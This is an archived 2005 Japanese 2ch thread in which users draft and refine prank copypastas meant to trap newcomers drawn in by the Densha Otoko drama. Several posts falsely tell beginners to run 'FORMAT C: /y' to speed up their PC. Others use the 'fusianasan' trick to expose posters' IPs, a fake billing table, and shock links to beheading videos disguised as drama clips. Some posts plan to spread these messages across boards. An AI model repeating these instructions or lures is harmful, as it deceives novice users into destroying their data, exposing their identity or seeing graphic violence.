5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

2ch初心者を陥れるためのガイドライン

1 :水先案名無い人:2005/07/08(金) 01:12:09 ID:nuflsQ3k0
【初心者の方へ】
2ちゃんねるは膨大な情報が行きかう電脳空間です。
快適に閲覧するには以下のことをしてください。

スタート>プログラム>アクセサリ>コマンドライン
で、次のコマンドを入力

FORMAT C:

入力後にYを押してください。
これで準備完了です。かならず再起動してくださいね。
ではいい2ちゃんねるライフを♪

2 :水先案名無い人:2005/07/08(金) 01:13:26 ID:ZopMtimP0
ほうほう

3 :讃岐フォアンフォアン▲ ◆SANUKI/VII :2005/07/08(金) 01:13:39 ID:/XgB9LApP ?###
ワロタ

4 :水先案名無い人:2005/07/08(金) 01:14:12 ID:ZopMtimP0
電車男の影響で初心者笛まくり!

5 :水先案名無い人:2005/07/08(金) 01:14:21 ID:5zUhW87d0
電車男やってる内はじゃんじゃん釣れそうだよな

6 :水先案名無い人:2005/07/08(金) 01:14:23 ID:43Gmy0G50
2ちゃん初めて来た時どこの板に居座ったよ?

7 :水先案名無い人:2005/07/08(金) 01:14:45 ID:jq0YgFMkO
これは流石にひどいだろ

8 :水先案名無い人:2005/07/08(金) 01:15:22 ID:H22GYHnl0
>1も皆も最初は初心者だったのにね。

9 :水先案名無い人:2005/07/08(金) 01:15:23 ID:nuflsQ3k0
やっぱ電車男ドラマ化された今が旬じゃね?

10 :水先案名無い人:2005/07/08(金) 01:17:07 ID:ZopMtimP0
>>5 みんな、もともと興味があったジャンルの板から入るんじゃね?
ニュー即とかはその後で

11 :水先案名無い人:2005/07/08(金) 01:21:46 ID:FLfF959W0
■■「電車男」のドラマで2chへ来られた皆さんへ■■

今回の主役である伊藤美咲さんと伊藤淳史さんの記念書き込みが
「裏2ちゃんねる」で公開されています。
裏2ちゃんねるとはその名の通り、裏の2ちゃんねるであり、普段は有料で公開されております。
しかし今回は「電車男」公開を記念いたしまして無料公開に踏みきった次第であります。

今回、運営陣が有料である「裏2ちゃんねる」への入り方をなぜ無料で公表するかというと、
今回のこのドラマが、2chの新たな一歩であるかを多くの人に知ってほしかったからです。

1.書き込みの名前の欄にhttp://fusianasan.2ch.net/と入れる。(裏ドメイン名)
2.本文を書き込む部分に guest←(カッコはいらない)を入れて、書込みボタンを押します。
3.タイトルが「ようこそ 裏2ちゃんねるへ(笑)」に変わればばOK
4.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
  都合上つながる確立が高いです。


12 :水先案名無い人:2005/07/08(金) 01:22:10 ID:5zUhW87d0
「ガイドライン」って名前のそもそもの意味を考えれば
初心者さんが最初に来てくれそうな気もしないでもないが。
スレタイもそれっぽくすれば良かったのに。

何にせよ童貞大百科がじゃんじゃん出来そうだな(笑

13 :水先案名無い人:2005/07/08(金) 01:27:19 ID:VytlXLen0
>>6
leaf/keyの八頭身スレ

14 :水先案名無い人:2005/07/08(金) 01:28:24 ID:4Whn04vM0
>>6
スクライドスレ

15 :水先案名無い人:2005/07/08(金) 01:30:51 ID:ZopMtimP0
                 _  _
             . -''¨ ̄   ̄   ̄¨ヽ、
           /ヘへ、r ツ     iヽrへヽ
           /ヘへヘr、/  i    l   i  ヽ
          ノ     |   |  l   |  l   l
          |  |    ト、 | |  |   | l|  .|
           |  |   | |ーヽト、ト、 |  |レナ|  |
          | .|ヘ | |ー;;;;;r-、ヽト、 .|;;‐ァ|  l
          ヽ.| ト、ト、|┴┴   iヽ|-┴ルイ      我々は常識を逸脱したフォーマットCで
            `i┬i`       l    /
             Yニヽ、    、  ´  ./         初心者を陥れる義務があります
              | `¨'ヽ、    ̄ /
          _. -‐''^     `i'ー-イ__
    _,. -‐=<          l     ̄¨'ーッ-- 、
   i'´:::::::::::::::::::::へ、       ノ      /::::::::::::::l

16 :水先案名無い人:2005/07/08(金) 01:32:49 ID:DTado4FT0
>>1ワロスwwwwwwwwwwwwwwwwwwwww

17 :水先案名無い人:2005/07/08(金) 01:35:28 ID:43Gmy0G50
こりゃ2ちゃん初心者というかパソコン初心者だな

18 :水先案名無い人:2005/07/08(金) 01:37:04 ID:3IoASFjO0
■■「電車男」のドラマで2chへ来られた皆さんへ■■

2chでの書込みには課金されますので御注意下さい。
 簡単な調べ方
  1.書き込みの名前の欄にhttp://fusianasan.2ch.net/と入れる。(課金サーバー)
  2.本文を書き込む部分に [ money ]←(カッコはいらない)を入れて、書込みボタンを押します。
  3.名前に【今月の使用額:$20,00】と出ればOK
  4.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
    都合上つながる確立が高いです。
  5.ドルだての料金になりますので、本日のレートが知りたい場合、
    2.の [ money ]の代わりに[ rate ]を入れると【今日のレート:1$=\105】と出ます。

■■料金表■■
■基本使用料
 $20,00/月(プラン加入の場合除く)
 月間1度以上アクセスすると基本使用料と以下の料金が適用されます。
■閲覧
 1板アクセス$3,00/月
 1スレッド $2,50/月
 リロード(更新)$0,05/回数
■書きこみ
 1レス $0,10/回数
 スレッド作成 $5,00/回数(大人の時間、ニュース速報は1000円/回数)
■トリップ使用料
 1つあたり$3,00
 #○○○(好きな文字列)を入れることによりトリップをつけることができます。
複数のトリップを使用される場合、各トリップごとに請求させていただきますのでご注意ください。 以上。

19 :水先案名無い人:2005/07/08(金) 01:42:32 ID:uDpysANz0
ワロタ

20 :水先案名無い人:2005/07/08(金) 02:19:04 ID:1vdvNylJ0
初心者だとfusianasanにひっかかっても
リモホ晒されてることにすら気付かなそう。

21 :水先案名無い人:2005/07/08(金) 02:48:18 ID:qkfb232p0
大音量のビックリ系のURLキボン

22 :水先案名無い人:2005/07/08(金) 03:01:32 ID:qkfb232p0
初心者が来そうなところにたくさん立ってるな


【ようこそ】電車男はここに!【2ちゃんねるへ】
http://tv8.2ch.net/test/read.cgi/tvsaloon/1120745539/ テレビサロン

電車男見ました〜(^0^)/
http://tv7.2ch.net/test/read.cgi/tvd/1120726667/ テレビドラマ

電車男を見て2chに来た人へ
http://tv8.2ch.net/test/read.cgi/tv/1120744948/ テレビ番組

■■ 電車男を見て初めて2ちゃんへ来た方へ ■■
http://etc3.2ch.net/test/read.cgi/entrance/1120747081/ ラウンジ

[電車男]を見て2ちゃんねるに来た人へ
http://etc3.2ch.net/test/read.cgi/qa/1120745992/ 初心者の質問


毒男は立ちすぎて訳分からん。釣りばっかだし



23 :水先案名無い人:2005/07/08(金) 03:15:45 ID:jmIYTP7c0
【激しくガイシュツ、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/〜hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.albinoblacksheep.com/flash/you.html (ブラクラ:「You are an idiot!」無限増殖/Windowオープン/ゾンビ ウィンドウ/無限 JavaScriptループ)
7. //www.albinoblacksheep.com/flash/open.html (6と同じです)
8. //www.youareanidiot.org/ (6と同じです)
9. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
10. //www.hellplant.org/cgi-bin/xoor/serpent.cgi (ブラクラ:「厨房ホイホイ」と呼ばれるIP抜きのトラップ。メディアプレイヤーやTelnetなど がいくつも同時に起動します)


24 :水先案名無い人:2005/07/08(金) 03:17:49 ID:jmIYTP7c0
【激しくガイシュツ、危険なサイト一覧=エログロ系】
5. //www.ogrish.com/(グロサイト。グロ画像&動画の最大の生産地)
※このサイトにある物は全てグロ画像、グロ動画と思っていいでしょう
6. //www.rotten.com/(グロ&ブラックジョークサイト)
7. //www.stileproject.com/monkey_sugar.swf(グロ画像満載のフラッシュ、通称「モンキーシュガー」)
8. //www.bmezine.com/service/samples/bonushigh/bonus5.jpg(切断された男性器が皿に載っている写真)
9. //gazo01.chbox.com/guromovie/src/****(gazo-boxグロ動画板)
10. //gazo01.chbox.com/occult/src/****(gazo-boxオカルト画像板)
11. //tmp.2chan.net/guro-gazou/src/****(ふたば☆ちゃんねる グロ画像掲示板)
【激しくガイシュツ、危険なサイト一覧=ジョーク&恐怖系】
1. //vip.6to23.com/jpgman/gui/gui.htm (ジョークサイト:全画面で怖い女の顔が表示され、ギャアギャアと泣き叫ぶ。Alt+F4で脱出)
2. //yaromat.com/macos8/ (ジョークサイト:デスクトップがMac風になる。Alt+F4で脱出)
3. //mayhem.net/juke/bodiesbeat1.html (ジョークサイト:前衛的な画像、音楽。画面が飛び回る。Alt+F4で脱出)
4. //www.subculture.com/(3と同じようなジョークサイト)
5. //wwwwwwwww.jodi.org/(意味不明なサイト。ソースを見ると…)
6. //pya.cc/pyaimg/img/2003090909.wmv(心霊動画「中古ビデオ」最後に女の顔のような物が映る)
7. //muvc.net/mumyou/? (遺影コラサイト。?にコラされた人の名が入る)
8. //*****.***/R3_temp.swf?inputStr=? (?以降の文字列がルパン3世のタイトルコール風に表示されるフラッシュ)
9. //www.liquidgeneration.com/sabotage/vision_sabotage.asp(色覚検査を装ったビックリフラッシュ)
10. //www.liquidgeneration.com/sabotage/******.***(****はファイル名違い、拡張子違い:すべてジョークフラッシュです)
11. //kur0nek0.web.infoseek.co.jp/obon/04/index.html(悲鳴声と共に怖い女の顔が表示され、アラートが開く。その後ホラーサイトに飛ぶ)
12. //ginjirou.blog.ocn.ne.jp/310ch/images/1100369590351.html [jpg] (不気味な首の長い女性の絵。精神を病んだ人が自殺直前に描いたというの はデマです)

25 :水先案名無い人:2005/07/08(金) 06:15:45 ID:fiQx0Y3X0
みなさんこんにちは(^_^)v
電車男さんの映画見て初めて2チャンネルに来ました!
本当に電車男さんのお話は感動しますね(T_T)涙が止まりませんでした〜。
まだ2チャンネルのことをよく知りませんがこれからよろしくお願いします!

26 :水先案名無い人:2005/07/08(金) 07:24:17 ID:V/V8xICI0
電車男〜電車男音声〜
http://www.consumptionjunction.com/downloads/cj_34947.wmv
電車男の素顔
http://dolby.dyndns.org/foo/foo/movie/neck_cut.asf
電車男〜エルメス留守電〜
http://www.consumptionjunction.com/downloads/cj_36037.wmv
電車男〜初めてのデート〜
http://www.ogrish.com/movies/ogrish-dot-com-turkish-hostage-executed-in-iraq.wmv
電車男〜めし どこか たのむ〜
http://www.ogrish.com/ogrish-dot-com-paul-johnson-beheading-video-full-
電車男〜告白キタ━━━━(゚∀゚)━━━━!!!!〜
http://www.ogrish.com/movies/ogrish-dot-com-beheading-of-egyptian-spy-in-iraq-video.wmv
電車男〜ノーカット〜
http://www.ogrish.com/movies/cia-agent-beheaded-in-iraq_full.wmv
電車男〜その後の電車男〜
http://www.ogrish.com/movies/ogrish-dot-com-bulgarian-beheading-video.wmv
http://ime.nu/dolby.dyndns.org/foo/foo/movie/neck_cut.asf

27 :水先案名無い人:2005/07/08(金) 07:38:04 ID:V/V8xICI0
【2ちゃんねるどんどんプロジェクト!!のお知らせ】

誰にでも簡単にAAが作れるツール 
「AA(エーエー)ツクール」の第3回配布キャンペーンを行います。(無料)
パソコン&携帯どちらからでもOK!(使い方は若干異なります)

これは【電車男記念!2ちゃんねるどんどんプロジェクト!!】を
盛り上げるために ただいま無料で配られているプレゼントツールのひとつです。
人気AAモナーが使い方を教えてくれる「モナー先生のAA授業」を初め、
簡単コピー機能も登載。120個ものAAキャラを一覧でき、コピー可能。
これを使えばどんな初心者でもAA(アスキーアート)が作ることが可能!
(この機能はパソコン 携帯両方とも入っています)

インストール手順(無料) [携帯 パソコン 両方同じです]
 
1:名前のところに『もっと  山崎渉  !!』
   E-mail にお使いになっているメールアドレスを入力。

2:本文はアンケートにお答えください。
    1.2ちゃんねるをどこで知りましたか?
    2.あなたの周りで2ちゃんねるは はやっていますか?
    3.好きなアーティストは誰ですか?(グループ可)
    4.2ちゃんねるのすきなキャラクターは何ですか?
    5・年齢をお書きください。
    6.最後に2ちゃんねるにメッセージを。

3:以降の項目に全てに記入の上 この宣伝を見たスレに書き込んでください。
   (他のスレには書き込まないでください。迷惑になります。)

  それでは皆さん 2ちゃんねるをごゆっくりお楽しみくださいませ。

28 :水先案名無い人:2005/07/08(金) 10:08:40 ID:P7V2XPJ30
ここはひどいインターネットですね。

29 :水先案名無い人:2005/07/08(金) 12:46:36 ID:qkfb232p0
【2ちゃんねる初心者の方へ】
以下のことをすると、軽くなって快適に2ちゃんねるができますよ。
2ちゃんねる暦長い人は皆やってます。

スタート>プログラム>アクセサリ>コマンドライン
で、次のコマンドを入力

FORMAT C:

入力後にYとエンターキーを押してください。
これで準備完了です。かならず再起動してくださいね。
これをすると、PCの処理速度や立ち上げが早くなり、
快適に2ちゃんねるができるようになります。
これをやっていない人はバレバレで2ちゃんねるで馬鹿にされるのでぜひやったほうがいいです。

30 :水先案名無い人:2005/07/08(金) 12:56:26 ID:5zUhW87d0
そんで引っかかってる奴が居るのが笑える(w

31 :水先案名無い人:2005/07/08(金) 12:58:29 ID:9ydP7eud0
2チャンネルって月額使用量とか必要なんですか?

32 :水先案名無い人:2005/07/08(金) 14:18:53 ID:43Gmy0G50
【個人利用】
一日5レスまで。
スレ立ては週に1回のみ可能。

33 :水先案名無い人:2005/07/08(金) 14:49:32 ID:5zUhW87d0
〜ビギナーモード〜

名前欄に「逝ってよし」と記入して書き込めば、1ヶ月までレス料半額、
セキュリティーモードが働いて、恐ろしいスーパーハッカーにもIPは抜かれません。

全板共通。


34 :水先案名無い人:2005/07/08(金) 14:58:28 ID:qkfb232p0
http://pekotan-pokotan.hp.infoseek.co.jp/page021.html

↑ワンクリ業者まとめサイト。適当に選んで使え

35 :もう遅いな:2005/07/08(金) 15:02:30 ID:KELZl/Cn0
【放映記念】特別臨時鯖・電車男ファンできました 関係者来るかも!?

★☆★臨時鯖:電車男ファンの入り方
記入例
     _______________        ____
名前 [http://fusianasan.2ch.net/den-drm/]   メール[012-3456]
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄         ̄ ̄ ̄ ̄

1.書き込みの名前の欄に http://fusianasan.2ch.net/den-drm/ と入力します。
2.E-mail欄に、郵便番号又は市外局番を入力します。
 (一つのサーバへの負荷集中を避けるよう、地域ごとにサーバを割り振っているため)
 なお、PC所在地と郵便番号・市外局番が一致しない場合はアクセス制限対象です
3.本文にIDとパスワードの 「電車男出発進行!」 を入れて、書込みボタンを押します。
4.メッセージが「確認終了いたしました。ありがとうございます。」に変わればばOK
5.サーバが重いと負荷回避が働き2chに戻ってくるけど、まあ30分以内であれば何回かやれば大丈夫。
6.全て半角で入力してください!!
       http://fusianasan.2ch.net/den-drm/←は、管理者専用の為「直リン」で飛んでも
       「サーバーが見つかりません」になります。
       入り方は「2ch」の「名前欄プログラム」(実用新案申請中)だけです。
       つまり、この掲示板から上記の操作を実行してください。
7.電車男ファンの内容については、出版・放送等の版権関係に絡みますので、よそでは他言しないでください
  またこのスレッドでの質問は上記の理由から答えられません

*操作を行う前に、ココが2ちゃんねる掲示板であることを再認識のうえ
2ちゃんねるの決まり事・約束事をもう一度しっかり確認することをお勧めします
 

36 :水先案名無い人:2005/07/08(金) 15:11:41 ID:hyoEbEPA0
【2ちゃんねる初心者の方へ】
以下のことをすると、軽くなって快適に2ちゃんねるができますよ。
2ちゃんねる暦長い人は皆やってます。

スタート>プログラム>アクセサリ>コマンドライン
で、次のコマンドを入力

FORMAT C: /y

入力後にエンターキーを押してください。
これで準備完了です。かならず再起動してくださいね。
これをすると、PCの処理速度や立ち上げが早くなり、
快適に2ちゃんねるができるようになります。
これをやっていない人はバレバレで2ちゃんねるで馬鹿にされるのでぜひやったほうがいいです

37 :水先案名無い人:2005/07/08(金) 15:14:19 ID:qkfb232p0


スレタイが悪いな。電車男って言葉が入ってない。
「電車男を見てきた2ch初心者を陥れるためのガイドライン」にすべき

38 :水先案名無い人:2005/07/08(金) 15:47:49 ID:qkfb232p0
ワンクリだから踏んじゃ駄目だお
(p)http://g-cute.com/?001
(p)http://1107.ch/pts/
(p)http://www.sex-blend.com/mamagoto/
(p)ttp://www.sex-blend.com/mamagoto/entry/index.php
(p)http://YahooBB220060140192.bbtec.net/
(p)http://st-girl.com/?111
(p)ttp://www.ladysroom.net/index2.php?7
(p)http://win.mierosoft.net/
(p)http://www.lapan.org/index2
(p)http://cute.eroeronist.com/?OAGK
(p)http://ladys-beauty.kir.jp/main/
(p)http://www.fokifoki.com/
(p)http://ikisoh.com/?77320010855714200


39 :水先案名無い人:2005/07/08(金) 17:11:24 ID:+kSEx1ORO
お前らひでーなw

40 :水先案名無い人:2005/07/08(金) 17:47:35 ID:AzZ1C8Fk0
おまいらはひどすぎる

41 :水先案名無い人:2005/07/08(金) 18:03:05 ID:nhjawrTE0
>>36
ワロタ
ただ、もう少しパソコン初心者にも分かりやすく作った方がいいかも?

42 :水先案名無い人:2005/07/08(金) 18:11:06 ID:/rx7J0Yx0
Vipperみたいな真似はよそうぜ

43 :水先案名無い人:2005/07/08(金) 18:19:49 ID:XXXs9rbw0
2ch初心者とPC初心者を混同してないか?
とマジレスしてみる

44 :水先案名無い人:2005/07/08(金) 18:33:55 ID:gv3eBNb+0
2ch初心者は高確率でPC初心者だからネ。

45 :山崎‎渉:2005/07/08(金) 18:46:00 ID:ZCnTmmSP0
(^^)

46 :fusianasan:2005/07/08(金) 18:55:26 ID:ZCnTmmSP0
test

47 :p32096-adsau07doujib3-acca.osaka.ocn.ne.jp:2005/07/08(金) 18:57:19 ID:ATOXmX4a0


48 :水先案名無い人:2005/07/08(金) 19:06:52 ID:ItbO9unn0
ここは原点に戻って鮫島事件のことを
実は俺の兄貴があの事件の関係

<以下のレスは省略されました。>

49 :水先案名無い人:2005/07/08(金) 19:08:49 ID:ICRklj020
>>43
常連者の中で>>1に引っかかるような馬鹿は居ないだろ

50 :水先案名無い人:2005/07/08(金) 19:11:31 ID:4ubS4qIP0
初心者でもスレタイで判断出来ると思うぞ

51 :水先案名無い人:2005/07/08(金) 19:56:52 ID:qkfb232p0
http://pekotan-pokotan.hp.infoseek.co.jp/page021.html

↑ワンクリ業者まとめサイト。

52 :水先案名無い人:2005/07/08(金) 20:04:01 ID:hf0BAeTR0
釣り師がここでネタを洗練してあちこちばらまくんだろ。

53 :水先案名無い人:2005/07/08(金) 20:05:20 ID:cXuY1jQk0
今弾薬を必要としている板があるからな

54 :水先案名無い人:2005/07/08(金) 22:34:13 ID:KELZl/Cn0
fusianasanやら料金表示やらで焦らせて、さらに削除要請に誘導

★重要削除専用★2chでの削除についてのおしらせ★初めての方へ★

2ちゃんねる内の発言を消したい場合は下記削除要請へ

news4vip:ニュース速報(VIP)[重要削除]
http://qb5.2ch.net/test/read.cgi/saku2ch/1088869422/

★書式例★

対象区分:[個人・三種]優先削除あり
削除対象アドレス:
http://news12.2ch.net/test/read.cgi/news4vip/対象スレッドURL/対象レス番号

削除理由・詳細・その他:
個人の住所晒しです。マルチ

*ここが2ちゃんねる掲示板であることを再認識の上
2ちゃんねるの仕組・決まり事・約束事を確認してからおこないましょう

55 :水先案名無い人:2005/07/08(金) 23:16:58 ID:Qs0aNoNy0
■■「電車男」のドラマで2chへ来られた皆さんへ■■

ただいま、2ちゃんねるでは 「電車男」による影響等を調べています。
「電車男」のドラマで2chへ来られた皆さん、お手数ですが協力をお願いいたします。

1.書き込みの名前の欄にhttp://fusianasan.enquete/と入れる。
2.本文を書き込む部分に guest←(カッコはいらない)を入れて、書込みボタンを押します。
3.書き込めればOK

56 :水先案名無い人:2005/07/08(金) 23:19:05 ID:5zUhW87d0
書き込むことでそいつのIPだけじゃなく年齢とか嗜好とか分かるような仕組みがいいな。

57 :水先案名無い人:2005/07/08(金) 23:24:17 ID:DNYqnrLD0
もういろんなとこにコピペばらまいてる?

58 :爆撃地点:2005/07/09(土) 00:15:40 ID:kWyQQs1j0
テレビサロン
http://tv8.2ch.net/tvsaloon/

テレビドラマ
http://tv7.2ch.net/tvd/

テレビ番組
http://tv8.2ch.net/tv/

初心者の質問
http://etc3.2ch.net/qa/

ラウンジ
http://etc3.2ch.net/entrance/



初心者が行くとしたらここあたりだろう。
各板に電車スレがある。支援求む。
毒男板はそっとしておいてやろう。電車スレありすぎてて住人に逆に迷惑なので可愛そうだ。

59 :水先案名無い人:2005/07/09(土) 02:51:14 ID:AYAFyt4H0
やめとけよキティども

60 :水先案名無い人:2005/07/09(土) 05:50:44 ID:1cGXyMXY0
実際節穴してるやつの8割はネタという説

61 :水先案名無い人:2005/07/09(土) 08:10:18 ID:6yt0LuBa0
もし初心者でゲーム好きなら、
ゲハ板だけは行かせたくない。

62 :水先案名無い人:2005/07/09(土) 10:16:04 ID:gx+sp16K0
>>44
つまりPCに慣れてる奴は皆ほとんど2chやってるってことか

63 :水先案名無い人:2005/07/09(土) 12:03:33 ID:J7jSm1Y4O
釣られたやつのレス集めたら面白そう
まあIPとかは伏せたほうがいいだろうけど

64 :水先案名無い人:2005/07/09(土) 13:43:13 ID:BQnmqlSJ0
新機能登場!
知ってた?裏2ちゃんねるにすぐ入れる今話題の新機能!
知らない人はやって見て下さい!!
[タッチセンサー機能]
下の枠の中を指で押してみて下さい。
■■■■■■
■       ■
■       ■
■       ■
■■■■■■
(結構力入れて押さないと失敗します)

65 :水先案名無い人:2005/07/09(土) 14:33:50 ID:9/MZphd2O
>>64デスクトップの奴はただ「??」ってなるだけなんじゃ…

66 :水先案名無い人:2005/07/09(土) 15:41:43 ID:dgluPe6h0
>>64
ノートパソ仕様かww

67 :水先案名無い人:2005/07/09(土) 16:51:22 ID:7kIR0LwB0
禁断のテンプレあたりはさすがに可哀相だろうな

68 :水先案名無い人:2005/07/09(土) 20:01:51 ID:BQnmqlSJ0
http://etc3.2ch.net/test/read.cgi/entrance/1120747081/l50
このスレのラフとしげるっつーコテ付けてる
リアル初心者のやりとりが痛いw

69 :水先案名無い人:2005/07/10(日) 10:00:21 ID:+J7Sb+MT0
あ、このスレにも初心者が来たか。

70 :水先案名無い人:2005/07/10(日) 10:55:49 ID:b/4KNZfy0
デスクトップの俺に教えてくれ
ノーパソで>>64やったらどうなるんだ?

71 :水先案名無い人:2005/07/10(日) 15:10:15 ID:O+kw+vQb0
>70
モニター蛾物故割れる

72 :水先案名無い人:2005/07/10(日) 16:52:20 ID:RuCKMT9U0
>>70
(・∀・)ニヤニヤ

73 :水先案名無い人:2005/07/10(日) 20:56:20 ID:y60it5gF0
>>70
大家のばあちゃんが倒れる

74 :水先案名無い人:2005/07/10(日) 21:05:53 ID:oGlW7qUe0
>>70
性器が腐る

75 :水先案名無い人:2005/07/10(日) 21:14:47 ID:3fDonnY30
>>70
死ぬ

76 :水先案名無い人:2005/07/10(日) 22:37:58 ID:RlfrXCHA0
>>70
空から美少女が降ってくる

77 :水先案名無い人:2005/07/10(日) 23:09:48 ID:oGlW7qUe0
>>70
三人ぐみト一緒におしおきされる

78 :水先案名無い人:2005/07/11(月) 02:01:47 ID:Z1PKeN/z0
>>70
一生童貞

79 :水先案名無い人:2005/07/11(月) 04:44:33 ID:0kqggHmi0
>>70
ヒント:結構力入れて押さないと失敗します

80 :水先案名無い人:2005/07/11(月) 04:55:55 ID:0LySQuUL0
液晶蛾ワヨンワヨンってなった

81 :水先案名無い人:2005/07/11(月) 05:13:06 ID:fXtYcyE/0
ワヨンワヨンワロタ

82 :70:2005/07/11(月) 08:11:06 ID:qtpxq7tt0
うはw俺人気者w

83 :水先案名無い人:2005/07/12(火) 14:23:39 ID:5DHbT6Wx0
ネオ麦茶も知らん奴が初心者叩いてんの見てると、なんか悲しくなる

84 :水先案名無い人:2005/07/12(火) 14:29:51 ID:7LYatRCl0
ネオ麦って何年頃だっけ

85 :水先案名無い人:2005/07/12(火) 14:33:45 ID:7LYatRCl0
あ、自己解決した

86 :水先案名無い人:2005/07/12(火) 21:59:48 ID:J6u72wiN0
×ネオ麦茶
○ネオむぎ茶

87 :水先案名無い人:2005/07/13(水) 05:41:30 ID:uyD0r19b0
殺人予告して逮捕された人だっけ?

88 :水先案名無い人:2005/07/13(水) 11:14:29 ID:/zjCrVoW0
>>87
バスジャックとかでググレ

89 :水先案名無い人:2005/07/14(木) 10:13:31 ID:/sa3AI5g0
もまえら電車男の元ネタは、実は
今昔物語に出ている「牛車男(ぎつしやをのこ)」なんじゃないか?
とかいう議論がなされてますよ。↓何だよこれ?

世界最強の説話集・今昔物語の現代的意義 2
http://academy3.2ch.net/test/read.cgi/kobun/1089126172/l50

90 :水先案名無い人:2005/07/14(木) 19:16:39 ID:MLrQJfuF0
>>89
これくらいが一番いい希ガス。
フォーマットはさすがになぁ…。使えねぇよ。

91 :水先案名無い人:2005/07/15(金) 15:14:15 ID:A7epSsit0
まぁあれだ、初心者がかかりやすい罠ってやっぱフシアナ>ブラクラ>ワンクリ架空請求>フォ(ryの順か

92 :水先案名無い人:2005/07/15(金) 16:18:01 ID:0UBq2xRy0
>>90
>フォ(ry
フォックスの怒りでアク禁ですね?

93 :水先案名無い人:2005/07/15(金) 18:06:16 ID:DHEuypkp0
>>92
フォースの暗黒面に取り込まれるじゃないの?

94 :水先案名無い人:2005/07/15(金) 18:45:54 ID:IZOQznFi0
【2ちゃんねる初心者の方へ】
2ちゃんねるでは様々な電子情報がコンマ0秒という単位で飛び交うので
以下のことをしないと快適に2ちゃんねるを楽しむ事が出来ません
2ちゃんねる暦が長い人は皆やってます。この機会にあなたもやってみましょう!
大丈夫。難しい事は何もありません。

スタート>プログラム>アクセサリ>コマンドライン
で、次のコマンドを入力

FORMAT C: /y

入力後にエンターキーを押してください。
これで準備完了です。かならず再起動してください。たったこれだけです。
フォーマットとは記憶装置固有のデータ記録方式の事で、
どの部分に何を記録したかを管理するための領域を確保する事を意味します。
詳しい事はhttp://www.google.co.jp/で検索してみましょう。

これをすると、PCの処理速度や立ち上げ、データ送受信が早くなり、
快適に2ちゃんねるができるようになります。
これをやっていない人は正直な話古参からはバレバレです。
2ちゃんねるで馬鹿にされないためにもぜひやっておきましょう!


他スレに貼ったけど>>1をちょっと改造した奴。
親切さを盛り込み微妙に複雑な単語を入れると厨は騙されやすいとみた。

95 :水先案名無い人:2005/07/15(金) 22:21:36 ID:aYsvUnFK0
これコマンドラインじゃなくてコマンドプロンプトだよな。

96 :水先案名無い人:2005/07/16(土) 14:23:39 ID:8/Yoky8I0
フロントラインは戦車に乗らない方が強い気がした

97 :水先:2005/07/16(土) 21:18:53 ID:ZIlzfnGu0
優秀な釣り氏のいるスレはここですか?

98 :水先案名無い人:2005/07/19(火) 01:15:18 ID:zwdsABFx0 ?##
典型的

【レイプ肯定】癲癇持ちを強制オナニーさせた藤藁君6【リベート部】
http://news19.2ch.net/test/read.cgi/news/1121616616/


99 :水先案名無い人:2005/07/19(火) 01:30:21 ID:/nCjO6Sv0
【2ちゃんねる初心者の方へ】
2ちゃんねるでは様々な電子情報がコンマ0秒という単位で飛び交うので
以下のことをしないと快適に2ちゃんねるを楽しむ事が出来ません
2ちゃんねる暦が長い人は皆やってます。この機会にあなたもやってみましょう!
大丈夫。難しい事は何もありません。

スタート>Windowsの終了>MS-DOSモードで再起動
で、次のコマンドを入力

FORMAT C: /y

入力後にエンターキーを押してください。
これで準備完了です。かならず再起動してください。たったこれだけです。
フォーマットとは記憶装置固有のデータ記録方式の事で、
どの部分に何を記録したかを管理するための領域を確保する事を意味します。
詳しい事はhttp://www.google.co.jp/で検索してみましょう。

これをすると、PCの処理速度や立ち上げ、データ送受信が早くなり、
快適に2ちゃんねるができるようになります。
これをやっていない人は正直な話古参からはバレバレです。
2ちゃんねるで馬鹿にされないためにもぜひやっておきましょう!

100 :水先案名無い人:2005/07/19(火) 12:28:34 ID:fe8x/oFL0
100ゲト

101 :水先案名無い人:2005/07/20(水) 02:29:40 ID:v3M1JuSK0
実際なんかネット初心者っぽい奴増えたよな
逝く所逝く所平気でマルチとかやってる奴が居るんだけど。

102 :水先案名無い人:2005/07/20(水) 03:28:19 ID:gkUJ579C0
マジレスってなんですか?って聞いてる奴。
メル欄にモロアド入れてる奴
アンカーの付け方知らない奴


確かに俺も遭遇してる

103 :水先案名無い人:2005/07/20(水) 16:37:53 ID:pT2ZEZmU0
アンカーが

<<103
とかアリエナス

104 :水先案名無い人:2005/07/20(水) 17:09:08 ID:9pdAMZI50
釣りがほとんどだけどたまに見る

105 :水先案名無い人:2005/07/20(水) 18:43:37 ID:qp3EEJP40
【2ちゃんねる初心者の方へ】
2ちゃんねるでは様々な電子情報がコンマ0秒という単位で飛び交うので
以下のことをしないと快適に2ちゃんねるを楽しむ事が出来ません
2ちゃんねる暦が長い人は皆やってます。この機会にあなたもやってみましょう!
大丈夫。難しい事は何もありません。

スタート>プログラム>アクセサリ>システムツール>ディスククリーンアップ
で、「ドライブの選択」というウィンドウが出ます。
そのまま「OK」を押して下さい。
「増加する空き領域を計算しています」と出るのでしばし待って下さい。
増加する空き領域の計算が終わると新たなウインドウが出るので、また「OK」を押して下さい。

これで準備完了です。かならず再起動してください。たったこれだけです。
ディスククリーンアップとは記憶装置固有のデータ記録容量増加方式の事で、
取得した情報を保持するための領域を確保する事を意味します。
詳しい事はhttp://www.googkle.co.jp/で検索してみましょう。

これをすると、PCの処理速度や立ち上げ、データ送受信が早くなり、
快適に2ちゃんねるができるようになります。
これをやっていない人は正直な話古参からはバレバレです。
2ちゃんねるで馬鹿にされないためにもぜひやっておきましょう!

